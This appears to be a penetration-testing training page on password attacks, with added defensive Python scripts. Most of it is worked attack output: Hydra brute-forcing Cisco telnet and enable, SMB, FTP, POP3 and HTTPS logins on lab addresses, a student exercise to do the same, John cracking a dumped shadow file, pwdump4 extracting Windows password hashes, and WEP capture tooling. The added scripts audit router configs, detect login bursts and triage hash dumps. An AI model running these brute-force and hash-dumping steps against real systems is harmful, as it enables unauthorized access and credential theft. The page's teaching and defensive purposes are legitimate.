In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message. In most schemes, the theoretical possibility of a brute force attack is recognised, but it is set up in such a way that it would be computationally infeasible to carry out.

Hydra

Hydra is a parallelized login hacker. It supports brute-forcing of Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. It includes SSL support and is part of Nessus. If you've been considering installing Linux, this would be a good time.

Using Hydra

bash-2.05b# ./hydra

Hydra v2.2 (c) 2002 by van Hauser / THC <vh@reptile.rug.ac.be>

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-o FILE] [-t TASKS] [-g TASKS] [-w TIME] [-f] [-e ns] [-s PORT] [-S] server service [OPT]

Options:

   -S        connect via SSL
   -s PORT   if the service is on a different default port, define it here
   -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
   -p PASS  or -P FILE try password PASS, or load several passwords from FILE
   -e ns     additional checks, "n" for null password, "s" try login as pass
   -C FILE   colon seperated "login:pass" format, instead of -L/-P option
   -o FILE   write found login/password pairs to FILE instead of stdout
   -f  exit after the first found login/password pair
   -t TASKS  run TASKS number of connects in parallel (default: 4)
   -g TASKS  start TASKS number per second until -t TASKS are reached
   -w TIME   in seconds, defines the max wait reply time (default: 30)
   server    the target server
   service   the service to crack. Supported protocols: [telnet ftp pop3 imap 
             http https smb cisco cisco-enable ldap nntp vnc rexec socks5 icq
             pcnfs]
   OPT       some service modules need additional input, put it here

Hydra is a tool to guess valid login/password pairs on a target server. You can always find the newest version at http://www.thehackerschoice.com/ Use this tool only for legal purposes!

bash-2.05b#

Cisco Router / Switch Bruteforce

NOTE: I have created a small password file called pass.txt in my Hydra binary directory. Replace this with your favourite password list.

We'll start with an NMAP fingerprinting of the Router:

bash-2.05b# nmap -O 192.168.1.229

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-10-05 14:48 IST
Interesting ports on 192.168.1.229:
(The 1641 ports scanned but not shown below are in state: closed)
Port       State       Service
23/tcp     open        telnet
79/tcp     open        finger
80/tcp     open        http
Device type: router
Running: Cisco IOS 11.X|21.X
OS details: Cisco IOS 11.3 - 12.0(11), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

Nmap run completed -- 1 IP address (1 host up) scanned in 5.141 seconds

bash-2.05b#

We've identified a running Telnet service. Let’s use Hydra to bruteforce the Telnet password.

Command line: ./hydra -P pass.txt 192.168.1.229 cisco

bash-2.05b# ./hydra -P pass.txt 192.168.1.229 cisco
Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)] 
[23][cisco] login:    password: cloud
Hydra finished.

bash-2.05b#

Once we have the Telnet (vty) login, we can try to bruteforce the router's enable password:

bash-2.05b# ./hydra -m cloud -P pass.txt 192.168.1.229  cisco-enable 
Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)]
[23][cisco-enable] login:    password: doggy
Hydra finished.

bash-2.05b#

So now we can telnet to the router with full access:

bash-2.05b# telnet 192.168.1.229
Trying 192.168.1.229...
Connected to 192.168.1.229.
Escape character is '^]'.

User Access Verification

Password: (cloud)
Switch>en
Password:  (doggy)
Switch#sh ru
Building configuration...
Current configuration:
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
enable password cloud
!
!
ip subnet-zero
!
! --More-- 
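The config dump above shows the two settings that made this attack cheap: "no service password-encryption" and a cleartext "enable password" sitting next to the "enable secret". The following Python script is an added example, not from the original page and not Cisco tooling, that audits an IOS running-config for exactly those settings. SAMPLE_CONFIG is the "sh ru" output above; the hardened variant, the type 7 check and the "username ... password" check are assumptions added for contrast.

```python
"""
Audit a Cisco IOS running-config for weak credential handling.
Added example; not from the original page or from Cisco.
SAMPLE_CONFIG reproduces the 'sh ru' output above; HARDENED_CONFIG is a
constructed counter-example with the findings fixed.
"""
import re

# Taken from the 'sh ru' output above (the enable secret is the page's own value).
SAMPLE_CONFIG = """\
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
enable password cloud
!
ip subnet-zero
!
"""

# Constructed: the same device with password-encryption on and no cleartext enable password.
HARDENED_CONFIG = """\
version 12.0
service password-encryption
hostname Switch
enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
"""

# Matches 'enable password [type] value' and 'username X password [type] value'.
PASSWORD_RE = re.compile(r"^(enable password|username (\S+) password)(?: (\d+))? (\S+)$")


def audit_ios_config(config):
    """Return a list of (check_id, detail) findings for the config text."""
    lines = [line.strip() for line in config.splitlines()]
    findings = []

    # IOS writes type 0 (cleartext) passwords unless password-encryption is on;
    # the default is off, so an absent line is as bad as the explicit 'no'.
    if "service password-encryption" not in lines:
        findings.append(("password-encryption-off",
                         "type 0 passwords are written to the config in cleartext"))

    has_secret = any(line.startswith("enable secret ") for line in lines)
    if not has_secret:
        findings.append(("no-enable-secret",
                         "no 'enable secret'; privileged mode relies on 'enable password'"))

    for line in lines:
        m = PASSWORD_RE.match(line)
        if not m:
            continue
        _, user, ptype, value = m.groups()
        label = "enable password" if user is None else f"username {user}"
        if ptype in (None, "0"):
            detail = f"{label} is readable in the config ('{value}')"
            if user is None and has_secret:
                # When both exist, IOS uses the secret for enable; the cleartext
                # value still leaks a password that is often reused elsewhere.
                detail += "; 'enable secret' takes precedence, but the value still leaks"
            findings.append(("cleartext-password", detail))
        elif ptype == "7":
            findings.append(("type7-password",
                             f"{label} uses type 7, a reversible encoding rather than a hash"))
    return findings


if __name__ == "__main__":
    for check, detail in audit_ios_config(SAMPLE_CONFIG):
        print(f"[{check}] {detail}")
    print("hardened:", audit_ios_config(HARDENED_CONFIG))
```

Run against the dump above it reports the missing password-encryption and the readable enable password, and nothing against the hardened variant; the precedence note explains why Hydra's cisco-enable run found a different password than the one printed in the config.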

SMB Password Bruteforce

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.141 smb

Reduced number of tasks to 1 (smb does not like parallel connections)

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 1, login tries: 13 (l:1/p:13)]

[139][smb] login: administrator password: lab

All childrens are dead.

bash-2.05b#

FTP Password Bruteforce

bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.110 ftp

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 14 (l:1/p:14)]

[21][ftp] login: administrator password: mypassword

Hydra finished.

bash-2.05b#

POP3 Password Bruteforce

bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)]

[110][pop3] login: muts password: mypassword

Hydra finished.

bash-2.05b#

.htpasswd over SSL Password Bruteforce

bash-2.05b# ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https

Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.

Hydra is starting! [parallel tasks: 4, login tries: 17 (l:1/p:17)]

[443][www] login: muts password: password

All childrens are dead.

bash-2.05b#
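Every Hydra run above looks the same from the server side: a burst of failed logins for one account from one source, and, when the list contains the password, a success right after. The following Python script is an added example, not from the page and not part of Hydra, that finds that pattern in an FTP server log. The log lines are constructed in vsftpd's log format, with 192.168.0.5 playing the Hydra client; the threshold of 6 failures in 60 seconds is an assumption.

```python
"""
Detect an online password-guessing burst (what the Hydra runs above look
like from the server) in an FTP log.  Added example, not from the page.
The log lines are constructed in vsftpd's log format; 192.168.0.5 plays
the Hydra client hitting 'administrator' with a small password list.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Sun Oct  5 14:47:30 2003 [pid 2] [muts] FAIL LOGIN: Client "192.168.0.7"
Sun Oct  5 14:48:01 2003 [pid 3] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:01 2003 [pid 4] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:02 2003 [pid 5] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:02 2003 [pid 6] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:03 2003 [pid 7] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:03 2003 [pid 8] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:04 2003 [pid 9] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:04 2003 [pid 10] [administrator] FAIL LOGIN: Client "192.168.0.5"
Sun Oct  5 14:48:05 2003 [pid 11] [administrator] OK LOGIN: Client "192.168.0.5"
Sun Oct  5 14:52:30 2003 [pid 12] [muts] OK LOGIN: Client "192.168.0.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$')


def parse_log(text):
    """Turn vsftpd-style lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "time": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"),
            "user": m["user"],
            "ip": m["ip"],
            "ok": m["result"] == "OK",
        })
    return events


def detect_bursts(events, threshold=6, window=timedelta(seconds=60)):
    """Return {ip: finding} for sources with at least `threshold` failures inside
    some `window`, noting whether a success followed the last failure."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e["ok"]]
        # Sliding window over failure timestamps: the peak is the largest number
        # of failures whose first and last entries are at most `window` apart.
        start, peak = 0, 0
        for end, e in enumerate(fails):
            while e["time"] - fails[start]["time"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1]["time"]
        success_after = any(
            e["ok"] and last_fail <= e["time"] <= last_fail + window for e in evs)
        findings[ip] = {
            "failures_in_window": peak,
            "users": sorted({e["user"] for e in fails}),
            # A success right after the burst is the signal that one guess worked.
            "success_after_burst": success_after,
        }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_bursts(parse_log(SAMPLE_LOG)).items():
        print(ip, finding)
```

The "users" field separates the two shapes of online attack: one user with many passwords (the Hydra runs above) versus many users with one password, which the same counter catches but which a per-user lockout would not.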

HydraGTK

Target selection:



Login/Password setup:



Hydra start and output:


Password Attacks (online) - Exercise

Duration: 15 mins

Prerequisites: Hydra 4.7 Win32 (http://www.hackingdefined.com/downloads/hydra-4.7-win.zip)

Goals:

1. Use Hydra to bruteforce SMB, FTP and Telnet on targets which the instructor will specify. What can you deduce about the speed of the attempts? What is it dependent on?

2. Use hydra to bruteforce SNMP community names on targets which the instructor will specify.

Password Bruteforce Attacks (offline)

root@slax:~# cat /etc/shadow
root:$1$WFevt681$X4KBvxd626C3wvzDiBRwy.:13040:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
muts:$1$2tp0OeOC$uGH1J17PQPgP4JT4Wvxvq.:13053:0:99999:7:::
root@slax:/etc/john# cat /etc/shadow > crackme
root@slax:/etc/john# john crackme
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:01 0% (2)  c/s: 3149  trying: nissan
guesses: 0  time: 0:00:00:07 17% (2)  c/s: 3232  trying: DOUG
guesses: 0  time: 0:00:00:08 20% (2)  c/s: 3231  trying: russel!
guesses: 0  time: 0:00:00:10 24% (2)  c/s: 3227  trying: western7
guesses: 1  time: 0:00:00:50 (3)  c/s: 3056  trying: cloud
cloud            (root)
doggy            (muts)
root@slax:/etc/john#

  • Bruting Hashes
  • Rainbowcrack Technique

Password Dumping



C:\tools>pwdump4 \\127.0.0.1

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
  by bingle@email.com.cn
This program is free software based on pwpump3 by Phil Staubs
under the GNU General Public License Version 2.

local path of \\127.0.0.1\ADMIN$ is: D:\WINDOWS
connect to 127.0.0.1 for result, plz wait...
SRV>Version: OS Ver 5.1, Service Pack 2, Workstation
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:FD449136606880E7FF14FEDDDADC3477:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:3062FDC0770C1166E7BA4694CAE62EE7:8D81C2D6AF0C47AA59BEA8CA94953E33:::
muts:1003:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:420DB818E7E2D8482F46E38190F1C500:::
LSA>Samr Enumerate 5 Users In Domain VAIO.
All Completed.

C:\tools>
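Before either dump above goes near John, a defender wants to know which accounts are blank, locked, or protected only by a legacy hash. The following Python script is an added example, not from the original page, John or pwdump, that triages both formats: the /etc/shadow lines and the pwdump4 lines are the page's own, embedded as sample input. It relies only on the crypt(3) prefix conventions and on the LM and NT hashes of the empty password.

```python
"""
Triage a credential dump: which accounts are blank, locked, or stored with
a legacy hash.  Added example, not from the original page; the sample input
is the page's own /etc/shadow and pwdump4 output.
"""

# LM and NT hashes of the empty password (the NT one is MD4 of "").
EMPTY_LM = "AAD3B435B51404EEAAD3B435B51404EE"
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# crypt(3) hash-type prefixes; "$1$" is the "FreeBSD MD5" john reports above.
CRYPT_PREFIXES = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
                  "$6$": "sha512crypt", "$y$": "yescrypt"}
LEGACY = {"md5crypt", "descrypt"}

SAMPLE_SHADOW = """\
root:$1$WFevt681$X4KBvxd626C3wvzDiBRwy.:13040:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
muts:$1$2tp0OeOC$uGH1J17PQPgP4JT4Wvxvq.:13053:0:99999:7:::
"""

SAMPLE_PWDUMP = """\
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:FD449136606880E7FF14FEDDDADC3477:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:3062FDC0770C1166E7BA4694CAE62EE7:8D81C2D6AF0C47AA59BEA8CA94953E33:::
muts:1003:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:420DB818E7E2D8482F46E38190F1C500:::
"""


def hash_type(field):
    """Classify the password field of a shadow entry."""
    if field == "":
        return "none"
    if field.startswith(("*", "!")):
        return "locked"
    for prefix, name in CRYPT_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"
    return "unknown"


def audit_shadow(text):
    """Map user -> {type, blank, locked, weak_hash, expires} for each shadow line."""
    report = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        maxdays = fields[4] if len(fields) > 4 else ""   # password max age
        kind = hash_type(pw)
        report[user] = {
            "type": kind,
            "blank": kind == "none",
            "locked": kind == "locked",
            "weak_hash": kind in LEGACY,
            "expires": maxdays not in ("", "99999"),
        }
    return report


def audit_pwdump(text):
    """Map user -> {rid, lm_stored, blank} for each pwdump-style line.
    pwdump does not show whether an account is disabled, so a blank Guest
    still needs checking against the account flags."""
    report = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue
        user, rid, lm, nt = fields[0], fields[1], fields[2].upper(), fields[3].upper()
        report[user] = {
            "rid": int(rid),
            "lm_stored": lm != EMPTY_LM,   # LM present: password is at most 14 chars and cracks fast
            "blank": nt == EMPTY_NT,       # NT hash of "": no password set
        }
    return report


def summarize(shadow_report, pwdump_report):
    """Flat list of (source, user, issue) tuples suitable for a ticket."""
    issues = []
    for user, r in shadow_report.items():
        if r["blank"]:
            issues.append(("shadow", user, "blank password"))
        if r["weak_hash"]:
            issues.append(("shadow", user, f"legacy hash ({r['type']})"))
    for user, r in pwdump_report.items():
        if r["blank"]:
            issues.append(("sam", user, "blank password"))
        if r["lm_stored"]:
            issues.append(("sam", user, "LM hash stored"))
    return issues


if __name__ == "__main__":
    for issue in summarize(audit_shadow(SAMPLE_SHADOW), audit_pwdump(SAMPLE_PWDUMP)):
        print(*issue)
```

On the page's dumps this reports md5crypt on both Linux accounts, blank passwords for Guest and muts, and a stored LM hash for HelpAssistant; Administrator has no LM hash, so either LM storage is disabled for it or its password exceeds 14 characters.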

Physical Access

  • Resetting passwords on Linux
  • Resetting passwords on Windows (local)
  • Resetting passwords on Windows (Domain Controller)
  • Resetting passwords on Cisco Devices
  • Exercises

Wireless Hacking

Netstumbler / EEYE Wireless Scanner

Kismet



Cracking WEP

root@slax:~/aircrack-2.3# ./airodump

 airodump 2.3 - (C) 2004,2005 Christophe Devine

 usage: airodump <interface name or pcap filename>
                 <output prefix> <channel> [IVs flag]

 Specify 0 as the channel number to hop between b/g channels;
 the channel is ignored if the packet source is a pcap file.

 If the optional IVs flag is set to 1, then only the captured
 unique WEP IVs are saved, so as to save space -- the default
 behaviour is to write the whole packets in libpcap format.

 Examples:

   Capture packets on channel 7: airodump ath0 wlan-dump 7
   Extract IVs from a pcap file: airodump out.cap small 0 1

root@slax:~/aircrack-2.3#

Cracking WPA

Overcoming MAC Address Restrictions

Web Applications

Networking Devices

Cisco Devices